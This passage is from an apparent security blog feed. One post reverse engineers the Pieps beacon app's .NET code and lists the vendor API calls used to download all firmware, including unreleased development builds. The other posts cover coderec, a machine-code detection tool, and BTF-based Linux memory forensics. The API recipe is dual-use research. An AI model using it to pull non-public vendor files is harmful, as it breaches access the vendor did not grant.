<p>Thus, to find the application’s business logic, one has to locate the .NET assemblies. Those are located in the <code class="language-plaintext highlighter-rouge">assemblies/</code> folder at the root of the <code class="language-plaintext highlighter-rouge">com.pieps.app.apk</code>. This folder contains two files: <code class="language-plaintext highlighter-rouge">assemblies.blob</code> and <code class="language-plaintext highlighter-rouge">assemblies.manifest</code>. The former is a custom archive format that contains the assemblies, while the latter holds some metadata about the assemblies.</p>

<p>The binary format of the <code class="language-plaintext highlighter-rouge">assemblies.blob</code> file is <a href="https://github.com/dotnet/android/blob/main/Documentation/project-docs/AssemblyStores.md#index-store">described in the documentation of .NET for Android</a>. Using this information, it is simple to create an <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/dotnet_asm_store.hexpat">ImHex pattern</a> to simplify the analysis of the binary file in the <a href="https://imhex.werwolv.net/">ImHex</a> hex editor.</p>

<p><img src="/media/pieps_00/imhex.png" alt="imhex" />
<em>Image: ImHex pattern for .NET assembly stores found in Xamarin Android apps.</em></p>

<p>The assembly store contains the binary streams of all the <code class="language-plaintext highlighter-rouge">.dll</code>s that comprise the application. Note that some of them may be <a href="https://github.com/dotnet/android/pull/4686">compressed</a> and have to be decompressed to get the final PE-file. Furthermore, the store also contains the hashes of the assembly names. The mapping between names and hashes is provided by the <code class="language-plaintext highlighter-rouge">assemblies.manifest</code> file. With those two components we can write a small <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/x_asm_store.py">script to extract all the .NET code of the application</a> <sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">3</a></sup>.</p>

<h3 id="ios">iOS</h3>

<p>As mentioned earlier, I usually prefer reverse engineering Android apps whenever possible. Furthermore, as the app is built with a cross-platform framework we can be pretty confident that we will find the same code in the iOS app. Nevertheless, it may be interesting to have a look at how Xamarin-based apps look on iOS.</p>

<p>On iOS, simply obtaining the app package is already significantly more troublesome. Fortunately, I have a few old iPhones lying around that are vulnerable to the <a href="https://habr.com/en/companies/dsec/articles/472762/">checkm8</a> exploit. After jailbreaking one of them, e.g., using <a href="https://github.com/palera1n/palera1n/tree/main">palera1n</a>, one can create <a href="https://docs.mvt.re/en/latest/ios/filesystem/dump/">full file system dumps</a> before and after installing the app. We can diff them to find out which files are created by installing the app. Following installation, two new folders appear: <code class="language-plaintext highlighter-rouge">private/var/mobile/Containers/Data/Application/424D0CE4-7E2B-4E33-AC51-9D64D42EBEDC/</code> and <code class="language-plaintext highlighter-rouge">private/var/containers/Bundle/Application/233304E0-32B7-47E5-9AA8-3001D7BFB7E9/</code>. Note that the UUIDs will differ for each app installation. The former appears to store mutable persistent data, while the latter contains the immutable app package. In the latter folder we can find some of the <code class="language-plaintext highlighter-rouge">.dll</code> files that we already know from the Android app, along with some framework <code class="language-plaintext highlighter-rouge">.dll</code>s that seem to be iOS-specific. In contrast to the Android app, they are present as individual files without any compression. Furthermore, there is a single native MachO file <code class="language-plaintext highlighter-rouge">PiepsAppiOS</code>, which likely (judging by strings) contains the full Mono .NET runtime for iOS, and a <code class="language-plaintext highlighter-rouge">PiepsAppiOS.exe</code> that is probably the .NET entry point of the app.</p>

<h3 id="net">.NET</h3>

<p>Now that we’ve reached the .NET code, we need a way to analyze it. There are two popular choices for .NET decompilers that work on Linux: <a href="https://github.com/codemerx/CodemerxDecompile">CodemerxDecompile</a> and <a href="https://github.com/icsharpcode/AvaloniaILSpy">ILSpy</a>. For some reason, ILSpy didn’t work for me. The UX of CodemerxDecompile, on the other hand, is pretty limited, especially when one is used to power tools like Ghidra. Therefore, I recommend using it solely to load all assemblies and then exporting them as a VS Code project. You can now work with this project in your favorite text editor.</p>

<p>Let’s start with an overview of the relevant assemblies and their functions.</p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">PiepsApp</code>: The cross-platform part of the app. Here is the high-level implementation of all the features observable via the UI.</li>
  <li><code class="language-plaintext highlighter-rouge">PiepsApp.{Droid,iOS}</code>: The platform-specific part of the app. Things like permissions, push notifications, file access or BLE communication.</li>
  <li><code class="language-plaintext highlighter-rouge">LibFirmwareStorage</code>: The app includes some firmware files along with their metadata. This assembly provides a way of querying and getting these resources.</li>
  <li><code class="language-plaintext highlighter-rouge">LibPiepsDevice</code>: Handles interaction with the device.
    <ul>
      <li>File transfer (upload/download) via <a href="https://en.wikipedia.org/wiki/XMODEM">Xmodem</a> protocol over BLE.</li>
      <li>Commands that can be sent to the device (bootloader or main firmware). Sending, receiving, decoding, etc.</li>
      <li>An interactive shell on top of the commands.</li>
      <li>Format of firmware files.</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">LibServicePortal</code>: Interaction with the backend API.
    <ul>
      <li>Account management (login, logout, deletion, creation, register/unregister/list devices, info, change password).</li>
      <li>Email verification.</li>
      <li>Listing of all existing devices (including some unreleased ones :) …).</li>
      <li>Query metadata about available firmwares for each existing device.</li>
      <li>Download of firmware files (including development firmwares :) …).</li>
      <li>Caching of API responses.</li>
    </ul>
  </li>
</ul>

<p>That’s a lot of interesting stuff… However, since our goal is obtaining firmware, let’s stay focused on that for now.</p>

<h2 id="firmware-download">Firmware Download</h2>

<p>First of all, the app already includes some firmwares as resources of the <code class="language-plaintext highlighter-rouge">LibFirmwareStorage</code> assembly. However, at this stage, we are no longer satisfied with some firmware files — we want ALL of them, including the ominous “development” firmwares.</p>

<p>By reading the code in <code class="language-plaintext highlighter-rouge">Pieps.ServicePortal.Services.PortalService</code>, we can get an idea of how the API works. To download all firmwares, both development and release versions, we can proceed as follows:</p>

<ol>
  <li>Log in by sending a POST request with the URL-encoded username and password to <code class="language-plaintext highlighter-rouge">/Token</code>. This returns an access token to use in subsequent requests.</li>
  <li>Get the list of all known products by sending a GET request to <code class="language-plaintext highlighter-rouge">/api/devicetype?registrationOnly=false</code>. This returns an array of products that look like this:
    <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
  </span><span class="p">{</span><span class="w">
 </span><span class="nl">"DeviceTypeID"</span><span class="p">:</span><span class="w"> </span><span class="mi">110</span><span class="p">,</span><span class="w">
 </span><span class="nl">"Name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"PIEPS PRO IPS"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"DeviceCategoryID"</span><span class="p">:</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w">
 </span><span class="nl">"FirmwareRelease"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.2.0.0"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"FirmwareUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Firmware/LVS/ProIPS/info.json"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"BetaRelease"</span><span class="p">:</span><span class="w"> </span><span class="s2">"LVS6SW.json"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"BetaUrl"</span><span class="p">:</span><span class="w"> </span><span class="s2">"ProIPS"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"RequiredRelease"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"RequiredUrl"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"ProductUrl"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"FAQUrl"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"BD"</span><span class="p">:</span><span class="w"> </span><span class="kc">null</span><span class="p">,</span><span class="w">
 </span><span class="nl">"HasBT"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
 </span><span class="nl">"ServiceActive"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
 </span><span class="nl">"Order"</span><span class="p">:</span><span class="w"> </span><span class="mi">8</span><span class="p">,</span><span class="w">
 </span><span class="nl">"CanRegister"</span><span class="p">:</span><span class="w"> </span><span class="kc">true</span><span class="p">,</span><span class="w">
 </span><span class="nl">"UnReleased"</span><span class="p">:</span><span class="w"> </span><span class="kc">false</span><span class="w">
  </span><span class="p">},</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
</span><span class="p">]</span><span class="w">
</span></code></pre></div>    </div>
    <p><em>Listing: Device entry in the array returned by <code class="language-plaintext highlighter-rouge">devicetype</code> endpoint.</em></p>
  </li>
  <li>We can now retrieve information about the available development firmwares by sending a GET request to <code class="language-plaintext highlighter-rouge">/api/firmware/development/file/{BetaUrl}/{BetaRelease}</code>. This gets us an array of firmware versions like this:
    <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">[</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
  </span><span class="p">{</span><span class="w">
 </span><span class="nl">"Version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"1.2.0.0"</span><span class="p">,</span><span class="w">
 </span><span class="nl">"Files"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w"> </span><span class="s2">"LVS6_V1.2.0.0.pfw"</span><span class="w"> </span><span class="p">],</span><span class="w">
 </span><span class="nl">"Description"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Public release"</span><span class="w">
  </span><span class="p">},</span><span class="w">
</span><span class="p">[</span><span class="err">...</span><span class="p">]</span><span class="w">
</span><span class="p">]</span><span class="w">
</span></code></pre></div>    </div>
    <p><em>Listing: Firmware entry in the array returned by the beta endpoint for the IPS Pro.</em></p>
  </li>
  <li>Finally, we can download the individual files via a GET request to <code class="language-plaintext highlighter-rouge">/api/firmware/development/file/{BetaUrl}/{Files[i]}</code>.</li>
</ol>

<p>Note that there are some older products for which the firmware is hosted in Azure cloud storage instead. It’s now trivial to write a <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/fw_dl.py">script to download all available firmware versions</a>.</p>

<p>Now that we have downloaded the firmware, let’s dive into analyzing its structure.</p>

<h2 id="firmware-analysis">Firmware Analysis</h2>

<p>Firmwares are stored in the custom <code class="language-plaintext highlighter-rouge">.pfw</code> container format, I guess that stands for Pieps Firmware. Luckily there is a parser for this format in <code class="language-plaintext highlighter-rouge">Pieps.PiepsDevice.File.PiepsFirmwareHeader</code>. Thus, we can write <a href="https://github.com/vobst/pieps_firmware_tools/blob/master/pieps_firmware_pfw.hexpat">another ImHex pattern</a>, this time for <code class="language-plaintext highlighter-rouge">.pfw</code> files.</p>

<p><img src="/media/pieps_00/imhexpfw.png" alt="imhexpfw" />
<em>Image: ImHex pattern for Pieps firmware (pfw) files.</em></p>

<p>There are like three and a half versions of this format. They always start with a common primary header. Our device of interest is using a format where this header is followed by a secondary header, which is followed by a variable number of block headers. Next comes some padding, followed by the actual blocks.</p>

<p>In this case, there are two blocks. The first is a ~124KiB block of application type <code class="language-plaintext highlighter-rouge">LVS6</code>, the internal name for our device. Then a ~23KiB block of application type <code class="language-plaintext highlighter-rouge">HogjiaHj131IMH</code>. The latter is probably referring to a <a href="https://www.hjsip.com.cn/#/product/small-module/detail/5?locale=zhCN">tiny BLE chip</a> by HongJia.</p>

<p><img src="/media/pieps_00/chipble.png" alt="chipble" />
<em>Image: Size comparison between a coin and the BLE chip used by the Pieps IPS Pro.</em></p>

<p>We can thus conjecture that there are two firmware payloads in the given container, one for the main SOC and one for a separate BLE controller. Thus, individual blocks of the pfw file contain separate firmwares.</p>

<p>To determine the CPU architecture we can throw the <a href="https://github.com/fkie-cad/CodeScanner">CodeScanner</a> or <a href="https://github.com/vobst/coderec">coderec</a> on the file. We can conclude that both chips are most likely ARM-based.</p>

<p><img src="/media/pieps_00/regions_plot.png" alt="regions_plot" />
<em>Image: CodeScanner result on LVS6_V1.2.0.0.pfw.</em></p>

<p>The next step would be to extract the individual blocks and load them into your preferred decompiler, but we’ll save that for a future post.</p>

<h2 id="conclusion">Conclusion</h2>

<p>In this post, we went from knowing nothing about the device and searching for a single firmware, to obtaining all of the vendor’s development firmwares for all its devices. We also uncovered unpublished devices (and their firmwares) through the API, and discovered traces of a BLE-based shell that exposes many interesting functionalities <sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">4</a></sup>.</p>

<p>Especially the shell looks interesting, but getting this one running is something for another post.</p>

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:1" role="doc-endnote">
      <p>This is, of course, not a priori clear, and I only found this out by first setting up a regular HTTP(S) proxy and not seeing any interesting traffic. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>It is usually a good idea to have the capture setup running before the initial connection — just not this time. <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>Yes, I realized there are already <a href="https://github.com/jakev/pyxamstore">tools</a> to do this, but I love to reinvent the wheel. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:4" role="doc-endnote">
      <p>Why the heck is this even part of the release app? <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name></name></author><summary type="html"><![CDATA[In retrospect, it is often incomprehensible why one started going down a rabbit hole. No matter how I fell in, my trusty recipe for climbing back out is to write everything down in a blog post — so have fun.]]></summary></entry><entry><title type="html">coderec: Detecting Machine Code in Binary Files</title><link href="https://blog.eb9f.de/2024/11/24/coderec.html" rel="alternate" type="text/html" title="coderec: Detecting Machine Code in Binary Files" /><published>2024-11-24T00:00:00+00:00</published><updated>2024-11-24T00:00:00+00:00</updated><id>https://blog.eb9f.de/2024/11/24/coderec</id><content type="html" xml:base="https://blog.eb9f.de/2024/11/24/coderec.html"><![CDATA[<p>Firmware reverse engineering comes with some unique challenges compared to the
reversing of programs that run in the user space of some mainstream operating
system. You will encounter one of them before Ghidra’s Code Browser even opens.
Let’s illustrate it at a concrete example: I recently got myself some old Cisco
devices off eBay as I was curious to have a look at their proprietary IOS
operating system. However, when loading the IOS image into Ghidra<sup id="fnref:5" role="doc-noteref"><a href="#fn:5" class="footnote" rel="footnote">1</a></sup> you are
greeted with the following screen:</p>

<p><img src="/media/coderec/ghidra.png" alt="" /></p>

<p>Hm, what’s the processor architecture of this thing<sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">2</a></sup>? In this case it’s
pretty easy to figure out the answer by googling the device or having a look at
its PCB. However, in general it is not that simple. To illustrate this let’s
throw <code class="language-plaintext highlighter-rouge">unblob</code> at the <code class="language-plaintext highlighter-rouge">.firmware</code> section of another IOS image that I pulled
off an older device:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>% fd '.*?.bin$'
273704-297420.zip_extract/brisco_fw.uncomp.bin
297420-355662.zip_extract/et2_firmware.uncomp.bin
355664-426609.zip_extract/a.bin
426612-500306.zip_extract/hwic_fpga.bin
500308-618801.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/nms/pse/pse_sm_fpga.bin
618804-671957.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/flash.bin
671960-870333.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/hsp.bin
870336-925103.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/thaddeus_flash.bin
925104-1171822.zip_extract/vws/dag/CPY-v124_22_t_throttle.V124_22_T5/vob/ios/sys/firmware/pas/hifnhsp/obj/kontrol/thaddeus_hsp.bin
</code></pre></div></div>

<p>Good luck figuring out what processor to select for each of those embedded
blobs!</p>

<p>We have a great tool for that purpose, the
<a href="https://github.com/fkie-cad/Codescanner"><code class="language-plaintext highlighter-rouge">Codescanner</code></a>. It works very well.
However, I have a longstanding
<a href="https://github.com/fkie-cad/Codescanner/blob/main/C_lib/libcodescan.so">problem</a>
with it. Besides that, it’s written in C++ and Python, and I think that
everything, absolutely everything, should be written in Rust (and open source).</p>

<p>So, let’s write a tool that identifies processor instructions in binary blobs!
Or is there anything more fun to do on a sunny weekend?</p>

<p><em>Note:</em> You can find the <strong>source code on
<a href="https://github.com/vobst/coderec">GitHub</a></strong>.</p>

<h2 id="statistics-of-machine-code">Statistics of Machine Code</h2>

<p>My core idea for the implementation is based on the
<a href="https://github.com/airbus-seclab/cpu_rec"><code class="language-plaintext highlighter-rouge">cpu_rec</code></a> tool by the awesome guys
from Airbus Seclab<sup id="fnref:2" role="doc-noteref"><a href="#fn:2" class="footnote" rel="footnote">3</a></sup>.</p>

<p><code class="language-plaintext highlighter-rouge">cpu_rec</code>’s detection mechanism is built around using different n-gram
distributions (bigrams and trigrams) of the instruction bytes as a unique
“fingerprint” of the corresponding processor. It computes these distributions
for a ground truth corpus of code for about 80 different processors, and then
compares them to the distributions of an unknown sample to determine its
architecture.</p>

<p>To better understand how and why this works, let’s have a look at the trigram
distributions of code for three popular embedded processors.</p>

<p><img src="/media/coderec/ARMel_tg.png" alt="" />
<img src="/media/coderec/PPCeb_tg.png" alt="" />
<img src="/media/coderec/MIPSeb_tg.png" alt="" /></p>

<p>Each data point corresponds to a trigram. The color-coding is according to the
probability to observe the trigram (from low to high: grey, orange, red, green,
blue). The exact mapping of intervals to colors does not matter here<sup id="fnref:3" role="doc-noteref"><a href="#fn:3" class="footnote" rel="footnote">4</a></sup>, what
does matter is that one can already see clear differences between the
distributions with the bare eye.</p>

<p>I could show similar plots for the bigram distribution, but we would not gain
much from that. For bigrams there is a neat different way to interpret them:
as conditional probabilities \(P(B | A)\) (given that you just observed byte
\(A\), what is the probability that the next byte is \(B\)). We obviously
loose some information by doing that transformation, but I still think it’s a
good illustration of how much the statistics of machine code depend on the
processor.</p>

<p><img src="/media/coderec/ARMel_cond_prob.png" alt="" />
<img src="/media/coderec/PPCeb_cond_prob.png" alt="" />
<img src="/media/coderec/MIPSeb_cond_prob.png" alt="" /></p>

<p>The plots show the conditional probabilities \( P(B | A) \)
on the vertical axis, and the projection to the 2d plane at the bottom
determines the pair (A, B). Orange points highlight cases where
\( P(B | A) = 0 \). While one can vaguely see that the clouds of blue
points have distinct features, clear differences are visible in the pattern of
orange points at the bottom.</p>

<h2 id="finding-instructions-and-more">Finding Instructions (and more)</h2>

<p>Given the main takeaway of the above section – certain byte-level probability
distributions can be used as the “fingerprint” of a processor – all that is
really left to do is to slice our target into pieces, compute the
relevant distributions for each piece, and find the architecture
with the “closest” distribution in the ground truth corpus.</p>

<p>Concerning the choice for distributions (bigrams and trigrams) and
“distance measure”<sup id="fnref:4" role="doc-noteref"><a href="#fn:4" class="footnote" rel="footnote">5</a></sup> (
<a href="https://en.wikipedia.org/wiki/Kullback-Leibler_divergence">Kullback-Leibler</a>
divergence (KL), aka. cross-entropy) I decided to stick with <code class="language-plaintext highlighter-rouge">cpu_rec</code>’s choices
for now. However, I guess one could experiment with other distributions and
measures as well.</p>

<p>Let’s try this approach (slicing the target into chunks and then computing KL of
each chunk with everything in corpus) on two bootroms that I dumped from these
Cisco devices I mentioned earlier.</p>

<p><img src="/media/coderec/bfc00000_bfc90000.dump_w4096_bg.png" alt="" />
<img src="/media/coderec/bfc00000_bfc90000.dump_w4096_tg.png" alt="" />
<img src="/media/coderec/ffc31000_ffd2b000.dump_w4096_bg.png" alt="" />
<img src="/media/coderec/ffc31000_ffd2b000.dump_w4096_tg.png" alt="" /></p>

<p>In the above plots, each colored line corresponds to a CPU architecture.
These lines “move along” the target file and their z-value is the KL of the
arch’s ground truth distribution and the distribution that was observed at the
corresponding offset in the target file. Red dots mark the best-fit (lowest)
KL for each chunk of the target file and are annotated with the name of the
corresponding architecture.</p>

<p>Just by looking at those plots we can already get a pretty good idea of what is
going on inside these ROMs. Unfortunately, if we look a bit closer, we will see
that the naive detection is still a bit noisy. Fortunately, we still have some
tricks up our sleeves that we can pull to reduce the noise level.</p>

<p>Intuitively, there is a difference between an architecture being called because
it is “clearly” the closest one for the chunk, or because it is just barely the
best fit among many lines that are around the same level.</p>

<p>What we are roughly looking for is something that captures the “statistical
significance” of the detection result. My approach for that is currently to
calculate the mean and variance of all the KLs in the range. Then, a detection
via bigrams or trigrams is immediately significant if it is more than two
standard deviations below the respective mean. If both detections are
significant but disagree, preference is given to trigrams as I found them to be
more reliable. If no detection meets the two-sigma criterion, we still make a
call if both detections are lower than the mean minus one standard deviation and
agree in their judgement. A final exception is made for the detection of ASCII
text, here, a detection via trigrams within one sigma is enough, no matter what
bigrams say.</p>

<p>With these additional heuristics in place, we get a relatively clean detection
result.</p>

<p><img src="/media/coderec/bfc00000_bfc90000.dump_w4096_regions.png" alt="" />
<img src="/media/coderec/ffc31000_ffd2b000.dump_w4096_regions.png" alt="" /></p>

<p>Those are the plots that I find the most useful in practice. There is a 1:1
correspondence between points in the plot and bytes in the file.
A point’s x-coordinate is the byte’s file offset,
the byte value is used as the y-coordinate, and coloring is used to
encode the detection result of the chunk that the byte resides in.</p>

<p>This means we can now leave this tangent that we embarked upon and finally start
analyzing this IOS image.</p>

<p><img src="/media/coderec/C800-UNI-159-3.M2_w81920_regions.png" alt="" /></p>

<hr />

<div class="footnotes" role="doc-endnotes">
  <ol>
    <li id="fn:5" role="doc-endnote">
      <p>After removing one layer of self-extracting archive. <a href="#fnref:5" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:1" role="doc-endnote">
      <p>Some IOS images are ELF files, however, the <code class="language-plaintext highlighter-rouge">eh_machine</code> entry is complete nonsense. For example, it’s “CDS VISIUMcore processor” for the example from the introduction. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:2" role="doc-endnote">
      <p>They really do a lot of awesome stuff for firmware analysis! <a href="#fnref:2" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:3" role="doc-endnote">
      <p>What would be quite important are axis labels though … but apparently the best Rust plotting library <a href="https://github.com/plotters-rs/plotters/issues/329">does not support that</a>. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
    <li id="fn:4" role="doc-endnote">
      <p>Cross-entropy is not a metric (distance function) in the mathematical sense. <a href="#fnref:4" class="reversefootnote" role="doc-backlink">&#8617;</a></p>
    </li>
  </ol>
</div>]]></content><author><name></name></author><summary type="html"><![CDATA[Firmware reverse engineering comes with some unique challenges compared to the reversing of programs that run in the user space of some mainstream operating system. You will encounter one of them before Ghidra’s Code Browser even opens. Let’s illustrate it at a concrete example: I recently got myself some old Cisco devices off eBay as I was curious to have a look at their proprietary IOS operating system. However, when loading the IOS image into Ghidra1 you are greeted with the following screen: After removing one layer of self-extracting archive. &#8617;]]></summary></entry><entry><title type="html">Towards utilizing BTF Information in Linux Memory Forensics</title><link href="https://blog.eb9f.de/2024/11/10/btf2json.html" rel="alternate" type="text/html" title="Towards utilizing BTF Information in Linux Memory Forensics" /><published>2024-11-10T00:00:00+00:00</published><updated>2024-11-10T00:00:00+00:00</updated><id>https://blog.eb9f.de/2024/11/10/btf2json</id><content type="html" xml:base="https://blog.eb9f.de/2024/11/10/btf2json.html"><![CDATA[<p>This post is about some work that I did on automatic profile generation for memory forensics of Linux systems. To be upfront about it: This work is somewhat half-finished – it already does something quite useful, but it could do a lot more, and it has not been evaluated thoroughly enough to be considered “production ready”. The reason I decided to publish it anyway is that I believe that there is an interesting opportunity to change the way in which we generate profiles for the analysis of Linux memory images <em>in practice</em>. However, in order for it to become a production tool, at least one outstanding problem has to be addressed (I have some ideas on that one) and lots of coding work needs to be done – and I simply do not have the resources to work on that right now.</p>

<p><em>Note</em>: It has been a while since I actively worked on this project, so if someone else ran with this idea in the meantime, please let me know!</p>

<p><em>Note</em>: You can find the code of the prototype <a href="https://github.com/vobst/btf2json">here</a>.</p>

<p>So, what is this work about? To analyze memory images, we need <em>profiles</em>, usually those are generated from DWARF debug information, e.g., using tools like <a href="https://github.com/volatilityfoundation/dwarf2json"><code class="language-plaintext highlighter-rouge">dwarf2json</code></a>. However, here is the problem: DWARF is HUGE, so production kernels never ship with it; thus, it is highly unlikely that the kernel on the target whose memory we are analyzing includes them. Luckily, most (but not all!) Linux distributions provide debug-packages for their kernels. Consequently, a precondition for the generation of a profile is usually to figure out the distribution and exact version of the kernel in the image, and then to download the corresponding debug package.</p>

<p>But now comes the surprise: What if I tell you that virtually every production kernel that ships today comes with most of the information that we need to generate a profile for it? And that this information can be readily extracted from a raw memory image? Exploring this opportunity is what this work was all about.</p>

<p>To explain how and why this works, I’ll start by <a href="#whats-a-profile">introducing the notion of a <em>profile</em> in memory forensics</a>, <a href="#whats-the-problem">state the problem that we strive to address</a>, then <a href="#whats-our-solution-meet-the-bpf-type-format-btf">talk about the BPF Type Format (BTF)</a>, <a href="#what-we-have">describe how BTF can be used to generate a part of a profile</a> (+ an <a href="#evaluation">evaluation of our implementation</a>), <a href="#symbols-are-only-partially-solved">discuss some open questions around symbols</a>, and finally <a href="#call-to-action">outline what needs to be done for this project to reach its full potential</a>.</p>

<p>Let’s get started!</p>

<ol id="markdown-toc">
  <li><a href="#whats-a-profile" id="markdown-toc-whats-a-profile">What’s a Profile?</a></li>
  <li><a href="#whats-the-problem" id="markdown-toc-whats-the-problem">What’s the problem?</a></li>
  <li><a href="#whats-our-solution-meet-the-bpf-type-format-btf" id="markdown-toc-whats-our-solution-meet-the-bpf-type-format-btf">What’s our solution? Meet The BPF Type Format (BTF)!</a></li>
  <li><a href="#what-we-have" id="markdown-toc-what-we-have">What we have!</a>    <ol>
      <li><a href="#evaluation" id="markdown-toc-evaluation">Evaluation</a></li>
    </ol>
  </li>
  <li><a href="#symbols-are-only-partially-solved" id="markdown-toc-symbols-are-only-partially-solved">Symbols Are Only Partially Solved</a></li>
  <li><a href="#call-to-action" id="markdown-toc-call-to-action">Call to Action</a>    <ol>
      <li><a href="#working-on-a-raw-memory-image" id="markdown-toc-working-on-a-raw-memory-image">Working on a Raw Memory Image</a></li>
      <li><a href="#evaluating-the-symdb-approach" id="markdown-toc-evaluating-the-symdb-approach">Evaluating the <code class="language-plaintext highlighter-rouge">symdb</code> Approach</a></li>
    </ol>
  </li>
  <li><a href="#appendix-a-accessed-symbols" id="markdown-toc-appendix-a-accessed-symbols">Appendix A: Accessed Symbols</a></li>
</ol>

<h2 id="whats-a-profile">What’s a Profile?</h2>

<p>In short: A <em>profile</em> is a bunch of information that is used by <em>analyses</em> to make sense of the raw bytes in a memory image. In other words, it allows you to “bridge the semantic gap” between 1s and 0s in a dump and the answer to interesting questions like “Which network connections did the process that was stated at 13:37 made?”.</p>

<p>Usually, a profile consists of two parts: Information about <em>symbols</em> and <em>types</em> of the kernel that was running on the machine. Symbols are what get you a foot in the door, i.e. where an analysis starts. For example, the head of the list of all tasks can be found via the <code class="language-plaintext highlighter-rouge">init_task</code> symbol. From there onward, the types are what allows an analysis to make sense of the raw bytes it finds, to transition between objects by following pointers, and eventually to extract useful information.</p>

<p>Symbols are pretty simple, they are just <em>names</em> for memory <em>locations</em> together with the <em>type</em> of the data that is stored there. We will say that the triple of <code class="language-plaintext highlighter-rouge">(name, location, type)</code> forms a symbol.</p>

<p>Types are essentially recipes that tell you how to turn raw bytes back into a value of a C-type, i.e., they are a description of the memory layout of a C-type. We will say that the tuple <code class="language-plaintext highlighter-rouge">(c_type_kind, c_type_name, memory_layout)</code> forms a type.</p>

<h2 id="whats-the-problem">What’s the problem?</h2>

<p>The information in a profile is specific to a <em>particular compilation</em> of the operating system kernel, e.g., think of the linker’s freedom in arranging global variables or compile-time options that influence the layout of types. For Windows and macOS it is possible to build a profile database of all released kernels, i.e., you only have to find out which release you have in your dump and then you are ready to go. For Linux, there is a whole zoo of distros and even more kernel packages, a new one of which gets released every few days <sup id="fnref:1" role="doc-noteref"><a href="#fn:1" class="footnote" rel="footnote">1</a></sup>. Building a comprehensive Linux profile database is an endeavor that is doomed to fail.</p>

<p>There are reliable heuristics for inferring the release of the OS in your dump. Those work well for Windows, macOS and most Linux distros. However, the infeasibility of building a Linux profile database means that you must still use that information about the release to build the profile yourself. Usually this involves downloading the debug package of that exact release and running some tool against it. If this package does not exist, you are lost at that point. In particular this implies that you are completely lost if you are not analyzing a dump of a system running a mainstream Linux distro.</p>

<p>So, let’s get to the definition of the “profile generation problem”: Given only the bytes in a memory dump, tell me the symbols and types of the kernel that was running in there (maybe not all of them, but enough to do useful analyses).</p>

<p>Are there existing solutions to this problem? Yes, plenty. There is like 1m of papers, some dating back many years, that identify and address this problem using all sorts of creative approaches, e.g., <a href="https://www.ndss-symposium.org/ndss-paper/an-os-agnostic-approach-to-memory-forensics/">Oliveri et al.</a>, <a href="https://dl.acm.org/doi/full/10.1145/3485471">Pagani et al.</a>, <a href="https://dl.acm.org/doi/abs/10.1145/3545948.3545980">Franzen et al.</a>, <a href="https://www.ndss-symposium.org/ndss-paper/auto-draft-193/">Qi et al.</a>, <a href="https://dfrws.org/presentation/automatic-profile-generation-for-live-linux-memory-analysis/">Cohen et al.</a>, or <a href="https://dl.acm.org/doi/abs/10.1145/2897845.2897850">Feng et al.</a>.</p>

<p>Seemingly, the “rule of the game” seems to be that you are allowed to do all sorts of up-front or on-demand analyses that involve the upstream Linux <em>source code</em>, and sometimes even on the live system, to support your analysis of the raw image. We’ll also need to make use of the former crutch to make our solution work.</p>

